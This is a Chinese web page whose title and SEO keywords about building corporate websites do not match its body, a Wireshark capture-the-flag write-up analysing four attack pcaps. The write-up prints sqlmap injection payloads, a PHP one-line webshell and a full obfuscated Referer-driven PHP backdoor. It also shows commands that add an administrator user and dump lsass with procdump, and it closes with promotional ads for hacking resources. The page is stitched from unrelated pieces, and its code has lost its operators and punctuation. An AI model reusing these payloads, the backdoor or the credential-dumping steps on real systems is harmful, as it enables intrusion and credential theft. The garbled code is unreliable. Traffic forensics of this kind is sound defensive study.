企业官网建设流程全解析

大连h5网站建设,wordpress 替换google,企业宣传册范例,中国网湖北官网文章目录前言一、题目一(1.pcap)二、题目二(2.pcap)三、题目三(3.pcap)四、题目四(4.pcap)前言 Wireshark流量包分析对于安全来说是很重要的#xff0c;我们可以通过Wireshark来诊断网络问题#xff0c;检测网络攻击、监控网络流量以及捕获恶意软件等等 接下来我们来看一道…文章目录前言一、题目一(1.pcap)二、题目二(2.pcap)三、题目三(3.pcap)四、题目四(4.pcap)前言Wireshark流量包分析对于安全来说是很重要的我们可以通过Wireshark来诊断网络问题检测网络攻击、监控网络流量以及捕获恶意软件等等接下来我们来看一道数据分析题。一、题目一(1.pcap)题目要求1.黑客攻击的第一个受害主机的网卡IP地址2.黑客对URL的哪一个参数实施了SQL注入3.第一个受害主机网站数据库的表前缀加上下划线例如abc4.第一个受害主机网站数据库的名字看到题目SQL注入那就首先过滤http和https协议过滤后可以看到两个出现次数比较多的ip202.1.1.2和192.168.1.8可以看到202.1.1.2对192.168.1.8进行了攻击这里第一个问题的答案就出来了受害主机网卡IP是192.168.1.8202.1.1.2为攻击者IP然后直接看源IP为202.1.1.2的http请求包这里随便先看一个包urlcode解码后如下可以看到黑客使用了SQL注入试图构造存储型xssoptioncom_contenthistoryviewhistorylist[ordering]item_id1type_id1list[select](XfqR2916 AND 11 UNION ALL SELECT 1,NULL,scriptalert(XSS)/script,tab再看一个包同样urlcode解码分析后发现仍在尝试SQL注入注入工具sqlmap注入点为list[select]optioncom_contenthistoryviewhistorylist[ordering]item_id1type_id1list[select]( OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71717a7671,(SELECT (ELT(883然后我们去追踪一个SQL注入的TCP流可以看到数据库为MariaDB已经报错而且表前缀为ajtuc_要找到数据库名的话我们最好去最后那几条去找看到url中如果包含schema关键字那大概率就是数据库名这里的数据库名使用十六进制解码解码出来就是joomla答案1.黑客攻击的第一个受害主机的网卡IP地址192.168.1.82.黑客对URL的哪一个参数实施了SQL注入list[select]3.第一个受害主机网站数据库的表前缀(加上下划线例如abc_)ajtuc_4.第一个受害主机网站数据库的名字joomla二、题目二(2.pcap)打开2.pcap题目要求1.黑客第一次获得的php木马的密码是什么2.黑客第二次上传php木马是什么时间3.第二次上传的木马通过HTTP协议中的哪个头传递数据题目要求php木马的密码首先我们要知道php一句话木马一般都是POST请求所以我们直接过滤POST请求发现这个IP请求了一个名为kkkaaa.php的php文件很可疑正常文件不会以此命名的 打开数据包看一下发现了这个字段Form item: zzz eval(base64_decode($_POST[z0]));其实一句话木马密码已经出来了就是zzz这里他上传的一句话木马应该是?php eval($_POST[zzz]);?然后又将eval(base64_decode($_POST[z0]));传入zzz参数目的是将z0传入的数据进行base64的解码此时z0传入base64编码后的数据便可以执行恶意代码解码后发现执行了dirname函数目的是查看当前路径下的文件或目录类似linux下的ls命令第二题是第二次上传木马的时间没有头绪的话来分析下过滤出来的这几个包其他参数都一样重要的是Length这个字段第一个包毋庸置疑是会比其他包长一点但是第四个包很奇怪和其他包相比长了150多字节左右追踪tcp流可以明显看到z2很不正常其他参数都是urlcode和base64编码z2使用十六进制编码我们来解码看一下这样的PHP代码是通过混淆过的让我们根本看不懂他的代码经过还原后的代码?php $kh cb42; $kf e130; function x($t, $k) { $c strlen($k); $l strlen($t); $o ; for ($i 0; $i $l;) { for ($j 0; ($j $c $i $l); $j, $i) { $o . $t{$i} ^ $k{$j}; } } return $o; } $r $_SERVER; $rr $r[HTTP_REFERER]; $ra $r[HTTP_ACCEPT_LANGUAGE]; if ($rr $ra) { $u parse_url($rr); parse_str($u[query], $q); $q array_values($q); preg_match_all(/([\w])[\w-](?:;q0.([\d]))?,?/, $ra, $m); if ($q $m) { session_start(); $s $_SESSION; $ss substr; $sl strtolower; $i $m[1][0] . $m[1][4]; $h $sl($ss(md5($i . $kh), 0, 3)); $f $sl($ss(md5($i . $kf), 0, 3)); $p ; for ($z 1; $z count($m[1]); $z) $p . $q[$m[2][$z]]; if (strpos($p, $h) 0) { $s[$i] ; $p $ss($p, 3); } if (array_key_exists($i, $s)) { $s[$i] . $p; $e strpos($s[$i], $f); if ($e) { $k $kh . $kf; ob_start(); eval(gzuncompress(x(base64_decode(preg_replace(array(/_/, /-/), array(/, ), $ss($s[$i], 0, $e))), $k))); $o ob_get_contents(); ob_end_clean(); $d base64_encode(x(gzcompress($o), $k)); print($k$d/$k); session_destroy(); } } } } ?检查后发现create_function函数这个函数是可以执行命令的官方也提示这个函数在8.0已经被移除并且和eval()函数有同样的安全隐患说明黑客是利用了create_function函数来上传了自己的木马时间的话ctrlf选择分组详情选择字符串搜索time字符串时间就出来了Feb 7, 2018 17:20:44.248365000中国标准时间然后我们来分析一下这个木马木马要利用就必然会与数据包进行交互仔细看看这两行代码$rr $r[HTTP_REFERER]; $ra $r[HTTP_ACCEPT_LANGUAGE];这两行代码是获取http请求中的referer和accept_language字段的与数据包产生了交互所以可以基本断定这两个字段是黑客用来传输他想执行的命令的我们随便看一个访问footer.php的包发现Referer字段长度很不正常Accept-Language字段正常所以可以基本确定木马通过HTTP协议中的referer头传递数据答案1.黑客第一次获得的php木马的密码是什么zzz2.黑客第二次上传php木马是什么时间17:20:44.2483653.第二次上传的木马通过HTTP协议中的哪个头传递数据Referer三、题目三(3.pcap)打开3.pcap题目要求1.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)2.php代理第一次被使用时最先连接了哪个IP地址题目要求mysql的数据直接过滤tcp contains “mysql” mysql发现黑客一直在爆破MySQL密码我们找到最后一条可能是爆破成功的密码用户admin密码Hash4858e7dcb0968daa7b599be4b0edb88a25ad89ac然后过滤http请求发现名为tunnel.php的php文件点开可以清晰地看到php代理第一次连接的IP地址是4.2.2.2端口53答案1.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c42.php代理第一次被使用时最先连接了哪个IP地址4.2.2.2我给大家准备了一份全套的《网络安全入门进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程需要的小伙伴可以扫描下方二维码或链接免费领取~四、题目四(4.pcap)打开4.pcap题目要求1.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候2.黑客在内网主机中添加的用户名和密码是多少3.黑客从内网服务器中下载下来的文件名获取当前目录的文件列表的命令Windows中是dirlinux中是ls直接过滤(ip.addr 192.168.1.8 || ip.addr 202.1.1.2) (http contains “dir” || http contains “ls”)发现有ls也有dir追踪tcp流发现第一次的ls没有执行成功因为没有服务器回显第二次的dir执行成功了搜索时间Feb 7, 2018 18:36:59.770782000中国标准时间在Windows下添加用户必然要使用net user管理员用户回显Administrator所以我们直接过滤(ip.addr 192.168.1.8 || ip.addr 202.1.1.2) (http contains “user” || http contains “Administrator”)这里看到是没有任何用户的时间Feb 7, 2018 18:49:27.767754000 中国标准时间再往后面看发现已经添加了管理员用户kaka时间Feb 7, 2018 18:50:42.908737000 中国标准时间那么黑客必然是在这个时间段执行了添加用户的命令然后我们就来看这期间的http请求直接通过时间过滤(ip.addr 192.168.1.8 || ip.addr 202.1.1.2) http frame.time_relative 827.109385 frame.time_relative 902.267039最终我们发现这个不寻常的请求通过base64解码发现cd/dC:\phpStudy\WWW\b2evolution\install\test\net user kaka kaka /addecho [S]cdecho [E]用户名和密码分别为 kaka:kaka最后一题是下载一句话木马是POST请求而且攻击的IP地址为192.168.2.20那就直接过滤ip.dst 192.168.2.20 http.request.method POST筛出来之后没办法只有一个个看base64解码然后在最后发现了这个包解码后cd/dC:\phpStudy\WWW\b2evolution\install\test\procdump.exe -accepteula -ma lspasss.dmpecho [S]cdecho [E]发现使用了procdump.exe往后看发现了这个包解码出来是这样的C:\phpStudy\WWW\b2evolution\install\test\lsass.exe_180208_185247.dmp最后我们可以确定黑客下载了lsass.exe_180208_185247.dmp文件答案1.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候Feb 7, 2018 18:36:59.7707820002.黑客在内网主机中添加的用户名和密码是多少kaka:kaka3.黑客从内网服务器中下载下来的文件名lsass.exe_180208_185247.dmp网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取